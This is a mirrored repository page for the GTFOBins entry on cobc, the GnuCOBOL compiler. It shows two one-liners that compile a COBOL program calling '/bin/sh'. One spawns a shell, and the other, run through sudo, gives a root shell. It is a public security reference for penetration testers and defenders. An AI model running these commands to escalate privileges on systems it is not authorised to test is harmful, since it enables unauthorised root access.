This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2025-12-28 11:11:41 +01:00
Code
Issues
08dfd05aee
GTFOBins.github.io
/
_gtfobins
/
cobc.md
bcoles
b94b01477c
Create cobc.md
2020-03-14 11:53:05 +01:00
319 B
Raw
Blame
History
functions
shell
sudo
code
TF=$(mktemp -d) echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x cobc -xFj --frelax-syntax-checks $TF/x
code
TF=$(mktemp -d) echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x sudo cobc -xFj --frelax-syntax-checks $TF/x